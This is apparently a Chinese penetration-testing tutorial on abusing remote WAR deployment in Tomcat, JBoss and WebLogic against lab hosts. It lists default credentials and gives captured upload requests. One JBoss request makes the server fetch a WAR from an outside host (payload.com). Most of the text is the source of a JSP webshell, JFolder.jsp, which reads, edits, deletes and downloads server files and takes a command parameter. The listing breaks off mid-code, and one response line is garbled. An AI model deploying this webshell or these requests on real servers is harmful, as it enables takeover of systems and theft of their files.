简介
远程部署漏洞属于服务器、中间件配置问题,攻击者可通过远程部署漏洞获取系统权限,远程部署漏洞经常出现在Tomcat、Jboss、Weblogic等web容器之上。
0x01 ### tomcat部署war包
http://192.168.52.128:8080/manager/html
tomcat/tomcat
POST /manager/html/upload;jsessionid=A0F8351E37AA865DDFC5EC921BFB4F9A?org.apache.catalina.filters.CSRF_NONCE=7C49D0AF0355D531EAB7DFE30F00FFA1 HTTP/1.1
Host: 192.168.52.128:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:8080/manager/html
Cookie: JSESSIONID=A0F8351E37AA865DDFC5EC921BFB4F9A
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------32062524929426
Content-Length: 31723
-----------------------------32062524929426
Content-Disposition: form-data; name="deployWar"; filename="test3693.war"
Content-Type: application/octet-stream
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<session-config>
<session-timeout>
30
</session-timeout>
</session-config>
<welcome-file-list>
<welcome-file>
index.jsp
</welcome-file>
</welcome-file-list>
</web-app>
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\')
{
sb.append("\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&";
else if (i == '<') return "<";
else if (i == '>') return ">";
else if (i == '"') return """;
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
-----------------------------32062524929426--
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=19B04531B519E953AAD3E2200F9F3D84; Path=/manager; HttpOnly
Content-Type: text/html;charset=utf-8
Date: Mon, 22 Feb 2021 05:02:48 GMT
Connection: close
Content-Length: 19860
<html>
<head>
<style>
H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}.line {height: 1px; background-color: #525D76; border: none;}
table {
width: 100%;
}
td.page-title {
text-align: center;
vertical-align: top;
font-family:sans-serif,Tahoma,Arial;
font-weight: bold;
background: white;
color: black;
}
td.title {
text-align: left;
vertical-align: top;
font-family:sans-serif,Tahoma,Arial;
font-style:italic;
font-weight: bold;
background: #D2A41C;
}
td.header-left {
text-align: left;
vertical-align: top;
font-family:sans-serif,Tahoma,Arial;
font-weight: bold;
background: #FFDC75;
}
td.header-center {
text-align: center;
vertical-align: top;
font-family:sans-serif,Tahoma,Arial;
font-weight: bold;
background: #FFDC75;
}
td.row-left {
text-align: left;
vertical-align: middle;
font-family:sans-serif,Tahoma,Arial;
color: black;
}
td.row-center {
text-align: center;
vertical-align: middle;
font-family:sans-serif,Tahoma,Arial;
color: black;
}
td.row-right {
text-align: right;
vertical-align: middle;
font-family:sans-serif,Tahoma,Arial;
color: black;
}
TH {
text-align: center;
vertical-align: top;
font-family:sans-serif,Tahoma,Arial;
font-weight: bold;
background: #FFDC75;
}
TD {
text-align: center;
vertical-align: middle;
font-family:sans-serif,Tahoma,Arial;
color: black;
}
form {
margin: 1;
}
form.inline {
display: inline;
}
</style>
<title>/manager</title>
</head>
<body bgcolor="#FFFFFF">
<table cellspacing="4" border="0">
<tr>
<td colspan="2">
<a href="http://tomcat.apache.org/">
<img border="0" alt="The Tomcat Servlet/JSP Container"
align="left" src="/manager/images/tomcat.gif">
</a>
<a href="http://www.apache.org/">
<img border="0" alt="The Apache Software Foundation" align="right"
src="/manager/images/asf-logo.svg" style="width: 266px; height: 83px;">
</a>
</td>
</tr>
</table>
<hr size="1" noshade="noshade">
<table cellspacing="4" border="0">
<tr>
<td class="page-title" bordercolor="#000000" align="left" nowrap>
<font size="+2">Tomcat Web Application Manager</font>
</td>
</tr>
</table>
<br>
http://192.168.52.128:8080/manager/html/upload;jsessionid=A0F8351E37AA865DDFC5EC921BFB4F9A?org.apache.catalina.filters.CSRF_NONCE=7C49D0AF0355D531EAB7DFE30F00FFA1
çÂĹĄÄşÂĹĽÄşÂÂÄşÂÂÄşÂÂĺżĹçÂÂÄÂÂäżĹ夝
ćĺé¨ç˝˛ĺĺşĺŚä¸ďź
FAIL – War file “test3693.war” already exists on server
http://192.168.52.128:8080/test3693/
0x02### Jboss远程部署war包
http://192.168.52.128
http://192.168.52.128/jmx-console/
POST /jmx-console/HtmlAdaptor HTTP/1.1
Host: 192.168.52.120
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://192.168.52.128
Connection: close
Referer: http://192.168.52.128/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
Cookie: PHPSESSID=ft4551u5ag2pu53sf5n4mgfqr0; immortal_png=undefined; immortal_etag=undefined; immortal_cache=undefined; md=nilihQQQmUvSPuXD1pm61Hk6EMV3222QLOzt4QJQaE8qzwt0lfxNnhjruFVW7odj; JSESSIONID=678AC48E10C635F07B63DEBEAE69ECD6
Upgrade-Insecure-Requests: 1
action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=7&arg0=http%3A%2F%2Fpayload.com%2Ftest.war
0x03 ### weblogic部署war包
http://192.168.52.128:7001/console/login/LoginForm.jsp
weblogic:Oracle@123
weblogic常用弱口令: http://cirt.net/passwords?criteria=weblogic
GET /console/login/LoginForm.jsp HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/login/LoginForm.jsp
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951
Connection: close
Cache-Control: max-age=0
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Mon, 22 Feb 2021 05:56:57 GMT
Pragma: no-cache
Content-Length: 3162
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" >
<title>Oracle WebLogic Server Administration Console</title>
<link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/general.css" >
<link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/window.css" >
<link rel="stylesheet" type="text/css" href="/console/css/login.css" >
<script type="text/javascript">
// Disable frame hijacking
if (top != self) top.location.href = location.href;
</script>
<style type="text/css">
html {
background-color: #185E87;
}
</style>
</head>
<body onload="document.loginData.j_username.focus();">
<div id="top">
<div id="login-header">
<div id="logo">
<img src="/console/framework/skins/wlsconsole/images/Branding_Login_WeblogicConsole.gif" alt="Oracle WebLogic Server Administration Console ">
</div>
</div>
<div id="content">
<div id="sidebar">
<img src="/console/framework/skins/wlsconsole/images/Login_11gLogo1.gif" alt="">
</div>
<div id="login">
<div id="title">
Welcome
</div>
<div id="login-form">
<form id="loginData" name="loginData" method="post" action="/console/j_security_check">
<div class="message-row">
<noscript><p class="loginFailed">JavaScript is required. Enable JavaScript to use WebLogic Administration Console.</p></noscript>
<p>Log in to work with the WebLogic Server domain</p>
</div>
<div class="input-row">
<label for="j_username">
Username:</label>
<span class="ctrl">
<input class="textinput" type="text" autocomplete="on" name="j_username" id="j_username">
</span>
</div>
<div class="input-row">
<label for="j_password">
Password:</label>
<span class="ctrl">
<input class="textinput" type="password" autocomplete="on" name="j_password" id="j_password">
</span>
</div>
<div class="button-row">
<span class="ctrl">
<input class="formButton" type="submit"
onclick="form.submit();this.disabled=true;document.body.style.cursor = 'wait'; this.className='formButton-disabled';"
value='Login'>
</span>
<input type="hidden" name="j_character_encoding" value="UTF-8">
</div>
</form>
</div>
</div>
</div>
<div id="info">
</div>
</div>
<div class="login-footer">
<div class="info">
<p id="footerVersion">WebLogic Server Version: 10.3.6.0</p>
<p id="copyright">Copyright © 1996, 2011, Oracle and/or its affiliates. All rights reserved.</p>
<p id="trademark">Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.</p>
</div>
</div>
</body>
</html>
登录成功后调整到如下地址:
http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
后台上传webshell
获取到管理员密码后,登录后台。点击左侧的部署,可见一个应用列表:
点击部署的数据包如下:
GET /console/console.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951; JSESSIONID=QrzGgzJTYv0TVjxk1Vl2zmcrX4n1Gg25SDWNLvJdfJkbzrRCvK7l!-1106686951
Connection: close
HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Cache-Control: no-cache,no-store,max-age=0
Connection: close
Date: Mon, 22 Feb 2021 06:08:41 GMT
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Pragma: No-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 43772
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Script-Type" content="text/javascript"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Summary of Deployments - base_domain - WLS Console</title><link rel="stylesheet" type="text/css" href="/console/framework/skeletons/wlsconsole/css/layout.css"><script src="/console/framework/skeletons/wlsconsole/js/buttons.js" type="text/javascript"></script><script src="/console/framework/skeletons/wlsconsole/js/util.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/general.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/menu.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/window.css"><link rel="stylesheet" type="text/css" href="/console/framework/skins/wlsconsole/css/console.css"><link rel="stylesheet" type="text/css" href="/console/css/content.css"><script src="/console/javascript/consoleUtil.js" type="text/javascript"></script><script src="/console/javascript/console-help.js" type="text/javascript"></script><script src="/console/javascript/recorder.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/changemgmt.css"><link rel="stylesheet" type="text/css" href="/console/css/forms.css"><script src="/console/javascript/changemgmt.js" type="text/javascript"></script><script src="/console/javascript/form.js" type="text/javascript"></script><script src="/console/javascript/PredicateEditor.js" type="text/javascript"></script><script src="/console/javascript/table.js" type="text/javascript"></script><script src="/console/javascript/portletrefresh.js" type="text/javascript"></script><script src="/console/javascript/ButtonMenu.js" type="text/javascript"></script><script src="/console/javascript/chooser.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/navtree.css"><script src="/console/javascript/tree.js" type="text/javascript"></script><link rel="stylesheet" type="text/css" href="/console/css/quicklinks.css"><link rel="stylesheet" type="text/css" href="/console/css/systemstatus.css"></head><body><div class="wlsc-header"><div id="console-header-logo"><a href="#repetitive_links"><img src="images/spacer.gif" alt="Skip repetitive links "></a><div><a href="http://192.168.52.128:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1" title="WebLogic Server Administration Console Home"><img src="framework/skins/wlsconsole/images/Branding_WeblogicConsole.gif" id="console-title" alt="WebLogic Server Administration Console Home "></a></div></div><div id="global-links"><span id="pageStatus"><img src="framework/skins/wlsconsole/images/pageIdle.gif" id="pageIdle" title="Idle" alt="Idle"><img src="framework/skins/wlsconsole/images/pageBusy.gif" id="pageBusy" title="Busy" alt="Busy"></span></div><div id="header-trans"><img src="framework/skins/wlsconsole/images/gradient-white-none.png" alt=""></div></div><div id="Home" class="wlsc-book"><div class="wlsc-book-content"><div id="page" class="wlsc-page"><div class="wlsc-2col-layout"><div id="console-content-col"><div id="console-content-col-inner"><div id="ToolbarBook" class="none"><div class="wlsc-book-content"><div id="ToolbarPage" class="wlsc-page"><div id="portlet_toolbar" class="wlsc-window "><div class="wlsc-window-content">
点击安装,选择“上载文件”:
选择需要上载的本地war包
上传的数据包
POST /console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/uploadApp HTTP/1.1
Host: 192.168.52.128:7001
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.128:7001/console/console.portal?AppApplicationInstallPortlet_actionOverride=/com/bea/console/actions/app/install/selectUploadApp
Cookie: ADMINCONSOLESESSION=KWbTgzHTnd8sQS7lyhQ1NfjvynrllJtxLZ92R2RtTW9qnvnJNfg1!-1106686951; JSESSIONID=QrzGgzJTYv0TVjxk1Vl2zmcrX4n1Gg25SDWNLvJdfJkbzrRCvK7l!-1106686951
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------8434166712903
Content-Length: 32108
-----------------------------8434166712903
Content-Disposition: form-data; name="AppApplicationInstallPortletuploadAppPath"; filename="test3693.war"
Content-Type: application/octet-stream
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4">
<session-config>
<session-timeout>
30
</session-timeout>
</session-config>
<welcome-file-list>
<welcome-file>
index.jsp
</welcome-file>
</welcome-file-list>
</web-app>
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*" %>
<%!
private final static int languageNo=0; //语言版本,0 : 中文; 1:英文
String strThisFile="JFolder.jsp";
String[] authorInfo={" <font color=red> 写的不好,将就着用吧 - - by 慈勤强 http://www.topronet.com </font>"," <font color=red> Thanks for your support - - by Steven Cee http://www.topronet.com </font>"};
String[] strFileManage = {"文 件 管 理","File Management"};
String[] strCommand = {"CMD 命 令","Command Window"};
String[] strSysProperty = {"系 统 属 性","System Property"};
String[] strHelp = {"帮 助","Help"};
String[] strParentFolder = {"上级目录","Parent Folder"};
String[] strCurrentFolder= {"当前目录","Current Folder"};
String[] strDrivers = {"驱动器","Drivers"};
String[] strFileName = {"文件名称","File Name"};
String[] strFileSize = {"文件大小","File Size"};
String[] strLastModified = {"最后修改","Last Modified"};
String[] strFileOperation= {"文件操作","Operations"};
String[] strFileEdit = {"修改","Edit"};
String[] strFileDown = {"下载","Download"};
String[] strFileCopy = {"复制","Move"};
String[] strFileDel = {"删除","Delete"};
String[] strExecute = {"执行","Execute"};
String[] strBack = {"返回","Back"};
String[] strFileSave = {"保存","Save"};
public class FileHandler
{
private String strAction="";
private String strFile="";
void FileHandler(String action,String f)
{
}
}
public static class UploadMonitor {
static Hashtable uploadTable = new Hashtable();
static void set(String fName, UplInfo info) {
uploadTable.put(fName, info);
}
static void remove(String fName) {
uploadTable.remove(fName);
}
static UplInfo getInfo(String fName) {
UplInfo info = (UplInfo) uploadTable.get(fName);
return info;
}
}
public class UplInfo {
public long totalSize;
public long currSize;
public long starttime;
public boolean aborted;
public UplInfo() {
totalSize = 0l;
currSize = 0l;
starttime = System.currentTimeMillis();
aborted = false;
}
public UplInfo(int size) {
totalSize = size;
currSize = 0;
starttime = System.currentTimeMillis();
aborted = false;
}
public String getUprate() {
long time = System.currentTimeMillis() - starttime;
if (time != 0) {
long uprate = currSize * 1000 / time;
return convertFileSize(uprate) + "/s";
}
else return "n/a";
}
public int getPercent() {
if (totalSize == 0) return 0;
else return (int) (currSize * 100 / totalSize);
}
public String getTimeElapsed() {
long time = (System.currentTimeMillis() - starttime) / 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
public String getTimeEstimated() {
if (currSize == 0) return "n/a";
long time = System.currentTimeMillis() - starttime;
time = totalSize * time / currSize;
time /= 1000l;
if (time - 60l >= 0){
if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
else return time / 60 + ":0" + (time % 60) + "m";
}
else return time<10 ? "0" + time + "s": time + "s";
}
}
public class FileInfo {
public String name = null, clientFileName = null, fileContentType = null;
private byte[] fileContents = null;
public File file = null;
public StringBuffer sb = new StringBuffer(100);
public void setFileContents(byte[] aByteArray) {
fileContents = new byte[aByteArray.length];
System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
}
}
// A Class with methods used to process a ServletInputStream
public class HttpMultiPartParser {
private final String lineSeparator = System.getProperty("line.separator", "n");
private final int ONE_MB = 1024 * 1;
public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
int clength) throws IllegalArgumentException, IOException {
if (is == null) throw new IllegalArgumentException("InputStream");
if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
""" + boundary + "" is an illegal boundary indicator");
boundary = "--" + boundary;
StringTokenizer stLine = null, stFields = null;
FileInfo fileInfo = null;
Hashtable dataTable = new Hashtable(5);
String line = null, field = null, paramName = null;
boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
boolean isFile = false;
if (saveFiles) { // Create the required directory (including parent dirs)
File f = new File(saveInDir);
f.mkdirs();
}
line = getLine(is);
if (line == null || !line.startsWith(boundary)) throw new IOException(
"Boundary not found; boundary = " + boundary + ", line = " + line);
while (line != null) {
if (line == null || !line.startsWith(boundary)) return dataTable;
line = getLine(is);
if (line == null) return dataTable;
stLine = new StringTokenizer(line, ";rn");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
line = stLine.nextToken().toLowerCase();
if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
"Bad data in second line");
stFields = new StringTokenizer(stLine.nextToken(), "="");
if (stFields.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in second line");
fileInfo = new FileInfo();
stFields.nextToken();
paramName = stFields.nextToken();
isFile = false;
if (stLine.hasMoreTokens()) {
field = stLine.nextToken();
stFields = new StringTokenizer(field, "="");
if (stFields.countTokens() > 1) {
if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
fileInfo.name = paramName;
String value = stFields.nextToken();
if (value != null && value.trim().length() > 0) {
fileInfo.clientFileName = value;
isFile = true;
}
else {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
}
else if (field.toLowerCase().indexOf("filename") >= 0) {
line = getLine(is); // Skip "Content-Type:" line
line = getLine(is); // Skip blank line
line = getLine(is); // Skip blank line
line = getLine(is); // Position to boundary line
continue;
}
}
boolean skipBlankLine = true;
if (isFile) {
line = getLine(is);
if (line == null) return dataTable;
if (line.trim().length() < 1) skipBlankLine = false;
else {
stLine = new StringTokenizer(line, ": ");
if (stLine.countTokens() < 2) throw new IllegalArgumentException(
"Bad data in third line");
stLine.nextToken(); // Content-Type
fileInfo.fileContentType = stLine.nextToken();
}
}
if (skipBlankLine) {
line = getLine(is);
if (line == null) return dataTable;
}
if (!isFile) {
line = getLine(is);
if (line == null) return dataTable;
dataTable.put(paramName, line);
// If parameter is dir, change saveInDir to dir
if (paramName.equals("dir")) saveInDir = line;
line = getLine(is);
continue;
}
try {
UplInfo uplInfo = new UplInfo(clength);
UploadMonitor.set(fileInfo.clientFileName, uplInfo);
OutputStream os = null;
String path = null;
if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
fileInfo.clientFileName));
else os = new ByteArrayOutputStream(ONE_MB);
boolean readingContent = true;
byte previousLine[] = new byte[2 * ONE_MB];
byte temp[] = null;
byte currentLine[] = new byte[2 * ONE_MB];
int read, read3;
if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
line = null;
break;
}
while (readingContent) {
if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
line = null;
uplInfo.aborted = true;
break;
}
if (compareBoundary(boundary, currentLine)) {
os.write(previousLine, 0, read - 2);
line = new String(currentLine, 0, read3);
break;
}
else {
os.write(previousLine, 0, read);
uplInfo.currSize += read;
temp = currentLine;
currentLine = previousLine;
previousLine = temp;
read = read3;
}//end else
}//end while
os.flush();
os.close();
if (!saveFiles) {
ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
fileInfo.setFileContents(baos.toByteArray());
}
else fileInfo.file = new File(path);
dataTable.put(paramName, fileInfo);
uplInfo.currSize = uplInfo.totalSize;
}//end try
catch (IOException e) {
throw e;
}
}
return dataTable;
}
/**
* Compares boundary string to byte array
*/
private boolean compareBoundary(String boundary, byte ba[]) {
byte b;
if (boundary == null || ba == null) return false;
for (int i = 0; i < boundary.length(); i++)
if ((byte) boundary.charAt(i) != ba[i]) return false;
return true;
}
/** Convenience method to read HTTP header lines */
private synchronized String getLine(ServletInputStream sis) throws IOException {
byte b[] = new byte[1024];
int read = sis.readLine(b, 0, b.length), index;
String line = null;
if (read != -1) {
line = new String(b, 0, read);
if ((index = line.indexOf('n')) >= 0) line = line.substring(0, index - 1);
}
return line;
}
public String getFileName(String dir, String fileName) throws IllegalArgumentException {
String path = null;
if (dir == null || fileName == null) throw new IllegalArgumentException(
"dir or fileName is null");
int index = fileName.lastIndexOf('/');
String name = null;
if (index >= 0) name = fileName.substring(index + 1);
else name = fileName;
index = name.lastIndexOf('\');
if (index >= 0) fileName = name.substring(index + 1);
path = dir + File.separator + fileName;
if (File.separatorChar == '/') return path.replace('\', File.separatorChar);
else return path.replace('/', File.separatorChar);
}
} //End of class HttpMultiPartParser
String formatPath(String p)
{
StringBuffer sb=new StringBuffer();
for (int i = 0; i < p.length(); i++)
{
if(p.charAt(i)=='\')
{
sb.append("\\");
}
else
{
sb.append(p.charAt(i));
}
}
return sb.toString();
}
/**
* Converts some important chars (int) to the corresponding html string
*/
static String conv2Html(int i) {
if (i == '&') return "&";
else if (i == '<') return "<";
else if (i == '>') return ">";
else if (i == '"') return """;
else return "" + (char) i;
}
/**
* Converts a normal string to a html conform string
*/
static String htmlEncode(String st) {
StringBuffer buf = new StringBuffer();
for (int i = 0; i < st.length(); i++) {
buf.append(conv2Html(st.charAt(i)));
}
return buf.toString();
}
String getDrivers()
/**
Windows系统上取得可用的所有逻辑盘
*/
{
StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : ");
File roots[]=File.listRoots();
for(int i=0;i<roots.length;i++)
{
sb.append(" <a href="javascript:doForm('','"+roots[i]+"\','','','1','');">");
sb.append(roots[i]+"</a> ");
}
return sb.toString();
}
static String convertFileSize(long filesize)
{
//bug 5.09M 显示5.9M
String strUnit="Bytes";
String strAfterComma="";
int intDivisor=1;
if(filesize>=1024*1024)
{
strUnit = "MB";
intDivisor=1024*1024;
}
else if(filesize>=1024)
{
strUnit = "KB";
intDivisor=1024;
}
if(intDivisor==1) return filesize + " " + strUnit;
strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ;
if(strAfterComma=="") strAfterComma=".0";
return filesize / intDivisor + "." + strAfterComma + " " + strUnit;
}
%>
<%
request.setCharacterEncoding("gb2312");
String tabID = request.getParameter("tabID");
String strDir = request.getParameter("path");
String strAction = request.getParameter("action");
String strFile = request.getParameter("file");
String strPath = strDir + "\" + strFile;
String strCmd = request.getParameter("cmd");
StringBuffer sbEdit=new StringBuffer("");
StringBuffer sbDown=new StringBuffer("");
StringBuffer sbCopy=new StringBuffer("");
StringBuffer sbSaveCopy=new StringBuffer("");
StringBuffer sbNewFile=new StringBuffer("");
if((tabID==null) || tabID.equals(""))
{
tabID = "1";
}
if(strDir==null||strDir.length()<1)
{
strDir = request.getRealPath("/");
}
if(strAction!=null && strAction.equals("down"))
{
File f=new File(strPath);
if(f.length()==0)
{
sbDown.append("文件大小为 0 字节,就不用下了吧");
}
else
{
response.setHeader("content-type","text/html; charset=ISO-8859-1");
response.setContentType("APPLICATION/OCTET-STREAM");
response.setHeader("Content-Disposition","attachment; filename=""+f.getName()+""");
FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath());
out.clearBuffer();
int i;
while ((i=fileInputStream.read()) != -1)
{
out.write(i);
}
fileInputStream.close();
out.close();
}
}
if(strAction!=null && strAction.equals("del"))
{
File f=new File(strPath);
f.delete();
}
if(strAction!=null && strAction.equals("edit"))
{
File f=new File(strPath);
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f)));
sbEdit.append("<form name='frmEdit' action='' method='POST'>rn");
sbEdit.append("<input type=hidden name=action value=save >rn");
sbEdit.append("<input type=hidden name=path value='"+strDir+"' >rn");
sbEdit.append("<input type=hidden name=file value='"+strFile+"' >rn");
sbEdit.append("<input type=submit name=save value=' "+strFileSave[languageNo]+" '> ");
sbEdit.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> "+strPath+"rn");
sbEdit.append("<br><textarea rows=30 cols=90 name=content>");
String line="";
while((line=br.readLine())!=null)
{
sbEdit.append(htmlEncode(line)+"rn");
}
sbEdit.append("</textarea>");
sbEdit.append("<input type=hidden name=path value="+strDir+">");
sbEdit.append("</form>");
}
if(strAction!=null && strAction.equals("save"))
{
File f=new File(strPath);
BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f)));
String strContent=request.getParameter("content");
bw.write(strContent);
bw.close();
}
if(strAction!=null && strAction.equals("copy"))
{
File f=new File(strPath);
sbCopy.append("<br><form name='frmCopy' action='' method='POST'>rn");
sbCopy.append("<input type=hidden name=action value=savecopy >rn");
sbCopy.append("<input type=hidden name=path value='"+strDir+"' >rn");
sbCopy.append("<input type=hidden name=file value='"+strFile+"' >rn");
sbCopy.append("原始文件: "+strPath+"<p>");
sbCopy.append("目标文件: <input type=text name=file2 size=40 value='"+strDir+"'><p>");
sbCopy.append("<input type=submit name=save value=' "+strFileCopy[languageNo]+" '> ");
sbCopy.append("<input type=button name=goback value=' "+strBack[languageNo]+" ' onclick='history.back(-1);'> <p> rn");
sbCopy.append("</form>");
}
if(strAction!=null && strAction.equals("savecopy"))
{
File f=new File(strPath);
String strDesFile=request.getParameter("file2");
if(strDesFile==null || strDesFile.equals(""))
{
sbSaveCopy.append("<p><font color=red>目标文件错误。</font>");
}
else
{
File f_des=new File(strDesFile);
if(f_des.isFile())
{
sbSaveCopy.append("<p><font color=red>目标文件已存在,不能复制。</font>");
}
else
{
String strTmpFile=strDesFile;
if(f_des.isDirectory())
{
if(!strDesFile.endsWith("\"))
{
strDesFile=strDesFile+"\";
}
strTmpFile=strDesFile+"cqq_"+strFile;
}
File f_des_copy=new File(strTmpFile);
FileInputStream in1=new FileInputStream(f);
FileOutputStream out1=new FileOutputStream(f_des_copy);
byte[] buffer=new byte[1024];
int c;
while((c=in1.read(buffer))!=-1)
{
out1.write(buffer,0,c);
}
in1.close();
out1.close();
sbSaveCopy.append("原始文件 :"+strPath+"<p>");
sbSaveCopy.append("目标文件 :"+strTmpFile+"<p>");
sbSaveCopy.append("<font color=red>复制成功!</font>");
}
}
sbSaveCopy.append("<p><input type=button name=saveCopyBack onclick='history.back(-2);' value=返回>");
}
if(strAction!=null && strAction.equals("newFile"))
{
String strF=request.getParameter("fileName");
String strType1=request.getParameter("btnNewFile");
String strType2=request.getParameter("btnNewDir");
String strType="";
if(strType1==null)
{
strType="Dir";
}
else if(strType2==null)
{
strType="File";
}
